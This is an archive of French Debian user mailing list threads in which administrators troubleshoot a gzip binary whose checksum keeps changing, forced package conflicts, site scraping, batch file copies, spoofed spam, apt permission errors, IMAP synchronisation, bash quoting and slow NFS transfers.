Salut à tous, AIDE m'a remonté que ce matin a partir de 7h00 la somme MD5 de l'exécutable gzip sur un des serveurs changeait en permanence : File: /bin/gzip MD5 : lyhcltnQrQ8ywl7Bz/kLvw== , z/l5IV9aH2GiFf8PQyQH0g== File: /bin/gzip MD5 : 87UaX+aTIbykxMzZJugFoA== , hpOZj30moVb7W2IznLCgng== File: /bin/gzip MD5 : QmxBWKDa+bcToRhbDlFwLA== , 4gjNhBD4+Tmy8C4p6Zj1Tw== J'ai vérifié à la mano et ça s'avérait exact : # md5sum /bin/gzip 6aec07042ce11be9c4f07a21f71772e1 /bin/gzip # md5sum /bin/gzip 6aec07042ce11be9c4f07a21f71772e1 /bin/gzip # md5sum /bin/gzip 68d4d97a9c3663fbffae9dc91e60c63b /bin/gzip # md5sum /bin/gzip 2b3b7ea888dc26c3bfffe0fcdbf3d7e8 /bin/gzip # md5sum /bin/gzip ad17cf5e14ff1f27fb143871003d5f72 /bin/gzip # md5sum /bin/gzip d5a4537541dbc3db8151146f563c9511 /bin/gzip # md5sum /bin/gzip 1eeb0c956419d5dae3c77c1b6fc6f021 /bin/gzip J'ai donc voulu le désinstallé pour le résinstallé. Mais apparemment il n'était pas dans la liste de mes paquets installés car l'autocompletion ne me proposait pas de le désinstaller : #apt-get remove g g++ g++-4.2 gamin gcc gcc-4.2 gcc-4.2-base gettext-base gnupg gpgv gsfonts Pensant qu'il pouvait faire partie d'un autre paquet que gzip, j'ai tenté un apt-file qui m'a retourné ceci : # apt-file search gzip /bin/zgrep: line 218: 4748 Segmentation fault gzip -cdfq -- $i 5- /bin/zgrep: line 218: 4756 Segmentation fault gzip -cdfq -- $i 5- /bin/zgrep: line 218: 4762 Segmentation fault gzip -cdfq -- $i 5- /bin/zgrep: line 218: 4769 Segmentation fault gzip -cdfq -- $i 5- Je tente donc de le réinstallé directement : # apt-get install gzip Reading package lists... Done Building dependency tree Reading state information... Done gzip is already the newest version. Il est déjà là :S Je tape donc la commande entiere pour le supprimer : # apt-get remove gzip [...] This should NOT be done unless you know exactly what you are doing! gzip 0 upgraded, 0 newly installed, 2 to remove and 5 not upgraded. After this operation, 348kB disk space will be freed. You are about to do something potentially harmful. To continue type in the phrase 'Yes, do as I say!' ?] Yes, do as I say! (Reading database ... 25486 files and directories currently installed.) Removing ubuntu-minimal ... dpkg - warning, overriding problem because --force enabled: This is an essential package - it should not be removed. Removing gzip ... La il veut bien :) Puis je le réinstalle (presque) sans problème, et depuis sa somme ne change plus. Avez-vous une idée d'où ça peut venir ? PS : Info utile, c'est un serveur virtuel xen Dom0 : Ubuntu 8.04.2 DomU : Ubuntu 8.04.2 - c'est sur celui là que ça changeait Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: Forcer l'installation d'un paquet sans en supprimer un autre
Le poulpe qui bloppe ! a écrit : Romaric DEFAUX a écrit : Salut à tous, Salut, Il y a une autre solution, qui est la suivante : Il faut d'abord télécharger le paquet deb (ici il dit qu'il va supprimer vsftpd, mais il ment) : apt-get install -d pure-ftpd Puis forcer l'installation en ne tenant pas compte des conflits : dpkg -i --force-conflicts pure-ftpd_1.0.21-11.4_amd64.deb pure-ftpd-common_1.0.21-11.4_all.deb Voilà, mais faites quand même attention avec ce genre de trucs, ça peut être dangereux :) Juste par curiosité, y'a t-il un moyen de vérifier autrement qu'avec un test en live sur une machine de test que les conflits ne seront pas trop dérangeants? Et comment va tu gérer ton prochain aptitude update aptitude upgrade si un des 2 paquets est concerné par un update? C'est juste pour info, mais drôlement intéressant ! J'imagine qu'il faut comparer la liste des fichiers que tes deux paquets vont installer, pour valider qu'il n'en n'ont pas en commun (pour que l'install de l'un n'écrase pas les fichiers de l'autre). Ici le conflit concernait juste le fait que ce sont tout les deux des serveurs FTP et donc utilisant le même port par défaut. Pour la mise à jour, il faudra que je force la désinstallation d'un des 2, que je fasse mes mises à jours, puis réinstalle de la même manière. C'est pas forcément trivial, mais c'est un cas vraiment particulier. En tout cas je confirme que ça marche bien, j'ai mes deux serveurs qui tournent en parallèle sans souci (du moins j'en ai pas encore remarqué :) ) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Forcer l'installation d'un paquet sans en supprimer un autre
Salut à tous, Sur un serveur j'ai un vsftpd qui tourne tout bien configuré. Je voudrais ajouter un pure-ftpd pour gérer des utilisateurs virtuels et le faire tourner sur un port non standard, mais quand je veux l'installer apt veut me désinstaller vsftpd. Y a-t-il un moyen de forcer l'installation de pure-ftp sans supprimer vsftp ? (autre qu'en compilant les sources :) ) Merci de votre aide :) Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: Forcer l'installation d'un paquet sans en supprimer un autre
Romaric DEFAUX a écrit : Salut à tous, Sur un serveur j'ai un vsftpd qui tourne tout bien configuré. Je voudrais ajouter un pure-ftpd pour gérer des utilisateurs virtuels et le faire tourner sur un port non standard, mais quand je veux l'installer apt veut me désinstaller vsftpd. Y a-t-il un moyen de forcer l'installation de pure-ftp sans supprimer vsftp ? (autre qu'en compilant les sources :) ) Merci de votre aide :) Romaric Re ! Bon bin jme répond à moi-même :) Il y a une autre solution, qui est la suivante : Il faut d'abord télécharger le paquet deb (ici il dit qu'il va supprimer vsftpd, mais il ment) : apt-get install -d pure-ftpd Puis forcer l'installation en ne tenant pas compte des conflits : dpkg -i --force-conflicts pure-ftpd_1.0.21-11.4_amd64.deb pure-ftpd-common_1.0.21-11.4_all.deb Voilà, mais faites quand même attention avec ce genre de trucs, ça peut être dangereux :) Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: arreter aspiration de site
GanGan a écrit : bonjour tous, Je rencontre un gros souci, je gère blog sous dotclear et il est régulièrement 3 a 4 fois par jour aspiré par de vilains bandits (ou c'est mal !!!) est ce que l'un d'entre vous a déjà rencontré ce problème ? une solution ? gangan Si tu utilises apache, regardes du côté de mod-evasive et mod-security, tu devrais trouver ton bonheur ;) Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
[Fwd: Re: arreter aspiration de site]
Retransféré à la liste :) Message original Sujet: Re: arreter aspiration de site Date: Fri, 27 Mar 2009 14:35:33 +0100 De: GanGan gan...@zalteam.com Organisation: Zalteam Pour :: Romaric DEFAUX r...@audaxis.com Références: 0fd5d9bfa70786478bc2d72314350...@zalteam.com 49cccb4d.3060...@audaxis.com mod secu ne bloque pas ce genre de chose j'ai essayé il faut que j'essaye mod evasive On Fri, 27 Mar 2009 13:49:17 +0100, Romaric DEFAUX r...@audaxis.com wrote: GanGan a écrit : bonjour tous, Je rencontre un gros souci, je gère blog sous dotclear et il est régulièrement 3 a 4 fois par jour aspiré par de vilains bandits (ou c'est mal !!!) est ce que l'un d'entre vous a déjà rencontré ce problème ? une solution ? gangan Si tu utilises apache, regardes du côté de mod-evasive et mod-security, tu devrais trouver ton bonheur ;) Romaric -- - GanGan - www.system-linux.eu ( / V_V -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org
Re: un script pour traitement par batch
Bernard a écrit : Bonjour à tous, Salut ! Je souhaite copier à part un certain nombre de fichiers choisis dans un répertoire. Sur les 1200 fichiers que contient ce répertoire, j'en ai sélectionné un peu plus de 400 de la liste, et j'ai éliminé les autres... Je les éliminés d'une liste récupérée via 'ls -l nomliste.txt', et non pas du répertoire ou d'une copie de celui-ci, ce qu'il aurait mieux valu que je fasse. Ce tri sur la liste m'ayant pris plusieurs heures de travail fastidieux, j'espère éviter de devoir le recommencer sur le contenu du répertoire. En fait, comme cette liste représentait déjà une sélection du contenu dudit répertoire, c'est environ 12500 fichiers qu'il me faudrait à nouveau trier. Comment copier, à partir de cette liste ? S'il ne s'était agit que d'une ou deux douzaines de fichiers, je n'eusse pas été embarrassé de faire 2 ou 3 douzaines de fois la manip suivante : cp /mnt/exthd/copié_collé_du_nom_du_fichier.sdm /home/mydir mais là, avec plus de 400 fichiers, c'est un peu fastidieux à faire ainsi. Alors, d'après ma liste de fichiers (chaque ligne comprenant un fichier avec la commande 'cp' que j'ai ajouté en chaque tête de ligne grâce à une manip dans un tableau OO_calc), comment est-ce que je peux faire un traitement en batch ? Un problème du même genre s'était posé à moi il y a 3 ou 4 ans, et je l'avais résolu par une petite routine écrite en Pascal (Free Pascal), ce qui avait été possible avec une routine 'for n=x to y do' parce que les noms de fichiers étaient faits de numéros croissants, ce qui n'est pas le cas pour mon problème actuel. En fait, les fichiers à traiter sont composés de chaînes de caractères avec des espaces (ce qui m'a obligé de les inclure entre des ' '), car il s'agit d'un archivage d'e-mails reçus via StarOffice 5.1 et 5.2, sur mon ancien ordi. for i in $(cat ta_liste);do echo $i;done Tu peux remplacer echo $i par : cp /mnt/exthd/$i /home/mydir/. Ce qui donnerait : for i in $(cat ta_liste);do cp /mnt/exthd/$i /home/mydir/.;done Merci d'avance pour toute suggestion pertinente. Bernard Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [HS? postfix] courrier mal dirigé
r...@suinot.org a écrit : bonsoir tous J'ai mon serveur postfix qui reçoit des mails qui ne vont pas dans le spam, mais que ne me sont pas tout à fait envoyé. je reçoit juste un avis du type Considered UNSOLICITED BULK EMAIL, apparently from you avec 4 pièces jointes: le header, le status_dns, le rapport d'erreur, et enfin le header de la section message. Le mail est toujours composé de la même façon: mon email pour les champs 'Return-Path', 'To' et 'From' , mais l'ip n'est pas celle de mon serveur bien sur. Cela devenant pénible, comment puis-je dire à postfix d'envoyer à la poubelle/quarantaine ce genre de stupidité sans me le dire! Et qu'elle est l'utilité d'un tel email, puisqu'il n'y a pas de réponse possible! (le contenu n'a l'air d'être qu'un binaire, pas de texte.) Merci de vos avis. Rémi. Salut, Tu devrais jeter un coup d'oeil du coté des SPF si tu veux que ton domaine ne soit pas utilisé pour envoyer du spam : http://fr.wikipedia.org/wiki/Sender_Policy_Framework Ce serait la meilleurs solution Sinon tu peux bloquer l'IP qui se fait spammer (au niveau d'iptable par exemple), comme ça tu n'en recevras plus les alertes, mais c'est le mode bourrin :) Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: APT-GET Permission non-accordée (alors que je suis root)
Salut Patrice ! Si tu fait un strace sur ton apt-get, tu devrais pouvoir voir où ça coince (problème de FS ou autre). De mémoire, la commande s'écrit ainsi : strace -o sortie.log apt-get install ton_paquet (mais fait quand même un pti man strace) Va directement voir à la fin du fichier sortie.log. Si tu ne comprends pas tout, mail nous les 50 dernières lignes de ce fichier, ça devrait être suffisant pour voir le problème. Cordialement Romaric steve a écrit : Le 29-01-2009, à 15:21:26 +0400, Patrice YEE CHONG TCHI KAN (patr...@network.re) a écrit : HPU1HD08:/var/www/www.kabardock.fr# df -h Sys. de fich. Tail. Occ. Disp. %Occ. Monté sur /dev/sda1 71G 16G 52G 24% / donc elle n'est pas pleine. C'est déjà ça. Remarque : pas besoin d'être en root pour ce genre de commandes (df, mount, etc..). tmpfs 507M 0 507M 0% /lib/init/rw udev 10M 52K 10M 1% /dev tmpfs 507M 0 507M 0% /dev/shm Qu'est que ça veut dire remount-ro dans /dev/sda1 on / type ext3 (rw,errors=remount-ro) ? Cela veut dire que s'il y a un problème avec le FS, le système va le remonter en mode ro, c'est à dire read only (lecture seule). Peut-être est-ce arrivé chez toi. Tu devrais peut-être redémarré le système et ensuite aller voir dans /var/log les fichiers modifiés au démarrage (syslog, dmesg, etc...) (fais un ls -lrt dedans, les dernières lignes sont les fichiers modifiés en derniers). Peux-tu installer d'autres programmes avec aptitude ou c'est seulement [me rappelle plus du nom] qui foire ? As-tu fait un aptitude update aptitude safe-upgrade avant ? Si oui pas de message d'erreur ? Je ne sais pas trop où regarder pour ton problème, désolé. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [HS] Outil de synchro Imap
David Soulayrol a écrit : Le jeudi 08 janvier 2009 à 13:43 +0100, Romaric DEFAUX a écrit : Avant d'aller plus loin, je souhaiterais avoir vos éventuel retours d'expérience. Merci, J'ai utilisé imapsync et j'en ai été super content. On a synchronisé plusieurs Gio de données sans aucun problème. En plus il est super simple d'utilisation. Mais je ne comprends pas exactement ce que tu cherche à faire. Tu vas synchroniser de free vers ton serveur local ? Je souhaite synchroniser Free et un pool MailDir local afin de ne pas avoir à exploiter le connexion Imap foireuse entre mutt et Free. Au passage, j'y gagne la consultation des mails offline. Sur un portable, c'est sympathique. Ça m'ouvre également des possibilités d'archivage intéressantes. Romaric Tu risques d'avoir un problème il me semble. Si tu synchronises depuis free vers chez toi, les mails qui sont sur le serveur de free et pas sur ton serveur seront copiés. Les mails que tu auras consultés sur ton serveur local et supprimés ou déplacés par exemple, seront alors re-copié depuis le serveur free vers chez toi à la prochaine synchro. Il faudra que tu synchronises dans l'autre sens aussi :) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [HS] Outil de synchro Imap
giggz a écrit : Romaric DEFAUX a écrit : David Soulayrol a écrit : Le jeudi 08 janvier 2009 à 13:43 +0100, Romaric DEFAUX a écrit : Avant d'aller plus loin, je souhaiterais avoir vos éventuel retours d'expérience. Merci, J'ai utilisé imapsync et j'en ai été super content. On a synchronisé plusieurs Gio de données sans aucun problème. En plus il est super simple d'utilisation. Mais je ne comprends pas exactement ce que tu cherche à faire. Tu vas synchroniser de free vers ton serveur local ? Je souhaite synchroniser Free et un pool MailDir local afin de ne pas avoir à exploiter le connexion Imap foireuse entre mutt et Free. Au passage, j'y gagne la consultation des mails offline. Sur un portable, c'est sympathique. Ça m'ouvre également des possibilités d'archivage intéressantes. Romaric Tu risques d'avoir un problème il me semble. Si tu synchronises depuis free vers chez toi, les mails qui sont sur le serveur de free et pas sur ton serveur seront copiés. Les mails que tu auras consultés sur ton serveur local et supprimés ou déplacés par exemple, seront alors re-copié depuis le serveur free vers chez toi à la prochaine synchro. Il faudra que tu synchronises dans l'autre sens aussi :) si je comprends ce que tu veux dire, offlineimap fait ça direct (enfin je crois). Si tu supprimes en local, il supprime à distance...c'est ainsi qu'en virant les métadonnées d'offlineimap, j'ai ordonné sans le vouloir la destruction de tous mes mails... :'( bye Je ne connais pas offlineimap, mais le principe de l'imap (contrairement au pop3), c'est de faire de la synchronisation entre le serveur et le client mail (thunderbird,...). Si tu supprimes un mail sur ton client, il est réellement supprimé du serveur. Si tu crées un répertoire, le répertoire est créé sur le serveur. Etc. L'avantage est pour la mobilité. Par exemple, si ton pc avec ton thunderbird configuré en imap sur un serveur quelconque crash et que tu dois tout réinstaller, quand tu vas reconfigurer ton client mail tout fraîchement réinstallé, tous les répertoires seront encore créés, avec les mails lu, les non-lus, etc... -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [bash] expansion de variable avec double quote
hd a écrit :
Bonjour,
Je rencontre un problème avec l'expansion des variables sous bash
J'utilise un script (que je ne peux modifier car il fait partie d'un
package tiers) qui lance un ./configure en lui passant des
paramamètres additionnels via une variable MY_ARGS
le script est quelque chose comme :
#!/bin/sh
./configure ${MY_ARGS}
...
et je le lance avec la commande :
MY_ARGS='--enable-truc CFLAGS=-g3 -O0' ./script.sh
je m'attends à ce qu'il soit interprété comme :
./configure --enable-truc CFLAGS=-g3 -O0
mais bash le transforme en :
./configure --enable-truc 'CFLAGS=-g3' '-O0'
ce qui fait 3 paramètres pour ./configure au lieu de 2
et évidemment ./configure sort en erreur en indiquant qu'il ne
comprend pas le paramètre -O0
Pourriez vous m'indiquer la bonne syntaxe pour que bash fasse ... ce
que je voudrais qu'il fasse
merci
Bonjour,
As-tu déjà essayé de protégé les double quote par \ ?
MY_ARGS='--enable-truc CFLAGS=\-g3 -O0\' ./script.sh
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/DebFrFrenchLists
Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et
Reply-To:
To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [bash] expansion de variable avec double quote
hd a écrit :
Romaric DEFAUX a écrit :
hd a écrit :
Bonjour,
Je rencontre un problème avec l'expansion des variables sous bash
J'utilise un script (que je ne peux modifier car il fait partie d'un
package tiers) qui lance un ./configure en lui passant des
paramamètres additionnels via une variable MY_ARGS
le script est quelque chose comme :
#!/bin/sh
./configure ${MY_ARGS}
...
et je le lance avec la commande :
MY_ARGS='--enable-truc CFLAGS=-g3 -O0' ./script.sh
je m'attends à ce qu'il soit interprété comme :
./configure --enable-truc CFLAGS=-g3 -O0
mais bash le transforme en :
./configure --enable-truc 'CFLAGS=-g3' '-O0'
ce qui fait 3 paramètres pour ./configure au lieu de 2
et évidemment ./configure sort en erreur en indiquant qu'il ne
comprend pas le paramètre -O0
Pourriez vous m'indiquer la bonne syntaxe pour que bash fasse ... ce
que je voudrais qu'il fasse
merci
Bonjour,
As-tu déjà essayé de protégé les double quote par \ ?
MY_ARGS='--enable-truc CFLAGS=\-g3 -O0\' ./script.sh
ben oui ... et dans ce cas il le protège tellement que le '\' est
aussi passé en param
MY_ARGS='--enable-truc CFLAGS=\-g3 -O0\' ./script.sh
se transforme en
./configure --enable-truc 'CFLAGS=\-g3' '-O0\'
donc ce n'est pas bon ...
J'ai l'impression que c'est l'espace entre -g3 et -00 qui pose problème.
Il considèrerait que MY_ARGS contient une suite d'arguments séparés par
des espaces. Et si tu protèges l'espace ça fait quoi ?
Tu pourrais nous montrer les parties de script.sh qui traite MY_ARGS et
CFLAGS ? Il y a peut-être un bug...
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/DebFrFrenchLists
Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et
Reply-To:
To UNSUBSCRIBE, email to debian-user-french-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [NFS] Debit limite
Nicolas KOWALSKI a écrit : 2008/12/9 Romaric DEFAUX [EMAIL PROTECTED]: Nicolas KOWALSKI a écrit : 2008/12/9 Romaric DEFAUX [EMAIL PROTECTED]: J'ai essayé plein d'options de montage différentes, les meilleurs perf. obtenues jusqu'à présent sont avec les options suivantes : -o sync,rw,hard,intr,rsize=32768,wsize=32768 Tu es donc en udp. Utiliser tcp améliore-t-il les choses ? Je ne peux pas tester ce soir, j'essaierai demain matin et je te dirais ce qu'il en est (il suffit juste d'ajouter l'option 'tcp' n'est-ce pas ?) Oui c'est ça. Quelles sont les options d'export sur le serveur (/etc/exports) ? Quel est le type de système de fichiers sous-jacent sur le serveur (ext3/xfs/...) ? Voici mon exports : /baiea 172.16.20.2(rw,sync,no_root_squash,no_subtree_check) L'option sync, bien que recommandée, influe énormément sur les perfs. Avec rsync tu ne spécifies pas cet aspect synchrone, il me parait donc normal qu'avec NFS ce soit plus lent. Et le système de fichier c'est de l'ext3 non journalisé. Mais si c'était le système de fichier en cause ça ne changerai rien de passer ou pas par NFS non ? ext3 non journalisé ? C'est en writeback ? ext3 n'est pas le SGF le plus performant pour un serveur NFS en mode synchrone. Si de plus tu utilises le mode writeback, autant passer directement à XFS ; la sureté des données sera la même... J'ai essayé diverses combinaisons, j'arrive à avoir maintenant un débit de 35Mo/s en moyenne :D ! Je suis passé en mode asynchrone, en tcp et j'ai retiré les rsize et wsize. Voici ma conf : Côté serveur mon /etc/exports : /baiea 172.16.20.2(rw,no_root_squash,no_subtree_check) Côté client : mount -t nfs -o rw,hard,intr,tcp 172.16.20.1:/baiea /baiea J'ai de plus modifié le txqueuelen sur les deux serveurs pour le passer à 1 (il est à 1000 par défaut). Je ne sais pas ce que tu entends par être en mode writeback, c'est activer le cache au niveau du disque ? Si c'est ça je pense qu'il l'est par défaut. Je n'ai pas le temps de reformater la baie pour changer de système de fichier, et les perf sont maintenant suffisantes pour être en production. Au niveau sûreté des données la baie est en raid5 matériel :) Merci de votre aide à tous ! Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
[NFS] Debit limite
Bonjour a tous ! J'ai un problème de limitation de debit sur un montage NFS. J'ai deux serveurs reliés en Gigabit par un câble croisé cat6. Pour schématiser : S1 - S2 gigabit Quand je fais un rsync de S1 vers S2 mon débit est d'environ 50Mo/s et quand j'utilise le montage NFS de S2 sur S1, avec un rsync aussi, impossible de dépasser les 15Mo/s. C'est ce qui me fait penser que le problème est vraiment lié au NFS. J'ai essayé plein d'options de montage différentes, les meilleurs perf. obtenues jusqu'à présent sont avec les options suivantes : -o sync,rw,hard,intr,rsize=32768,wsize=32768 S1 est une gentoo : linux-2.6.26-gentoo-r3 net-fs/nfs-utils-1.1.3 S2 est une ubuntu : ii libnfsidmap2 0.20-0build1 An nfs idmapping library ii nfs-common1:1.1.2-2ubuntu2.1 NFS support files common to client and serve ii nfs-kernel-server 1:1.1.2-2ubuntu2.1 support for NFS kernel server Vous avez une idée sur la source du problème ? Merci de votre aide Romaric -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Debit limite
Gilles MISSONNIER a écrit : je ne comprends pas la logique : une fois S2 monté NFS sur S1, vous faites un rsync d'un fichier qui est sur S1 vers S2, et donc que depuis le serveur S1, on voit le fichier local a S1 ET le la copie sur S2 par NFS. il y a mise à jour en permanence lors de la copie de S1 vers S2, simplement pour que le volume S2 soit correctement vu (par NFS) depuis S1. On Tue, 9 Dec 2008, Romaric DEFAUX wrote: + Bonjour a tous ! + + + J'ai un problème de limitation de debit sur un montage NFS. + J'ai deux serveurs reliés en Gigabit par un câble croisé cat6. + + Pour schématiser : + + + S1 - S2 + gigabit + + + Quand je fais un rsync de S1 vers S2 mon débit est d'environ 50Mo/s et quand + j'utilise le montage NFS de S2 sur S1, avec un rsync aussi, impossible de + dépasser les 15Mo/s. C'est ce qui me fait penser que le problème est vraiment + lié au NFS. + + J'ai essayé plein d'options de montage différentes, les meilleurs perf. + obtenues jusqu'à présent sont avec les options suivantes : + -o sync,rw,hard,intr,rsize=32768,wsize=32768 + + S1 est une gentoo : + linux-2.6.26-gentoo-r3 + net-fs/nfs-utils-1.1.3 + + S2 est une ubuntu : + ii libnfsidmap2 0.20-0build1 An nfs + idmapping library + ii nfs-common1:1.1.2-2ubuntu2.1 NFS + support files common to client and serve + ii nfs-kernel-server 1:1.1.2-2ubuntu2.1 + support for NFS kernel server + + Vous avez une idée sur la source du problème ? + + Merci de votre aide + + Romaric + + Pour être plus concret : Sur S1, j'ai S2:/baiea on /baiea type nfs (rw,sync,hard,intr,rsize=32768,wsize=32768,addr=172.16.20.1) Si je fais un rsync comme ça par exemple : rsync -auv --stats --progress /root/grosfichier.zip /baiea/. mon débit ne dépasse pas les 15Mo/s Alors que si je fais, depuis S1 : rsync -auv --stats --progress /root/grosfichier.zip [EMAIL PROTECTED]:/baiea/. mon débit est aux alentours de 50Mo/s Merci de votre aide :) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Debit limite
rvenne a écrit : tes cartes réseaux ( des 2 cotées) supportent elles le jumpo frame? je suppose que le switch le supporte, Je ne passe pas par un switch, les deux serveurs sont reliés directement par un câble croisé. Concernant le jumpo (jumbo ?) frame, je suppose que oui (je ne sais pas comment vérifier...). Sur S1 j'ai : 06:07.0 Ethernet controller: Intel Corporation 82541GI Gigabit Ethernet Controller (rev 05) 07:08.0 Ethernet controller: Intel Corporation 82541GI Gigabit Ethernet Controller (rev 05) et sur S2 : 05:00.0 Ethernet controller: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet (rev 12) 09:00.0 Ethernet controller: Broadcom Corporation NetXtreme II BCM5708 Gigabit Ethernet (rev 12) J'arrive à atteindre du 50Mo/s sans passer par le NFS, c'est ce débit là que je voudrais atteindre en utilisant le NFS. Romaric DEFAUX a écrit : Gilles MISSONNIER a écrit : je ne comprends pas la logique : une fois S2 monté NFS sur S1, vous faites un rsync d'un fichier qui est sur S1 vers S2, et donc que depuis le serveur S1, on voit le fichier local a S1 ET le la copie sur S2 par NFS. il y a mise à jour en permanence lors de la copie de S1 vers S2, simplement pour que le volume S2 soit correctement vu (par NFS) depuis S1. On Tue, 9 Dec 2008, Romaric DEFAUX wrote: + Bonjour a tous ! + + + J'ai un problème de limitation de debit sur un montage NFS. + J'ai deux serveurs reliés en Gigabit par un câble croisé cat6. + + Pour schématiser : + + + S1 - S2 + gigabit + + + Quand je fais un rsync de S1 vers S2 mon débit est d'environ 50Mo/s et quand + j'utilise le montage NFS de S2 sur S1, avec un rsync aussi, impossible de + dépasser les 15Mo/s. C'est ce qui me fait penser que le problème est vraiment + lié au NFS. + + J'ai essayé plein d'options de montage différentes, les meilleurs perf. + obtenues jusqu'à présent sont avec les options suivantes : + -o sync,rw,hard,intr,rsize=32768,wsize=32768 + + S1 est une gentoo : + linux-2.6.26-gentoo-r3 + net-fs/nfs-utils-1.1.3 + + S2 est une ubuntu : + ii libnfsidmap2 0.20-0build1 An nfs + idmapping library + ii nfs-common 1:1.1.2-2ubuntu2.1 NFS + support files common to client and serve + ii nfs-kernel-server 1:1.1.2-2ubuntu2.1 + support for NFS kernel server + + Vous avez une idée sur la source du problème ? + + Merci de votre aide + + Romaric + + Pour être plus concret : Sur S1, j'ai S2:/baiea on /baiea type nfs (rw,sync,hard,intr,rsize=32768,wsize=32768,addr=172.16.20.1) Si je fais un rsync comme ça par exemple : rsync -auv --stats --progress /root/grosfichier.zip /baiea/. mon débit ne dépasse pas les 15Mo/s Alors que si je fais, depuis S1 : rsync -auv --stats --progress /root/grosfichier.zip [EMAIL PROTECTED]:/baiea/. mon débit est aux alentours de 50Mo/s Merci de votre aide :) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [NFS] Debit limite
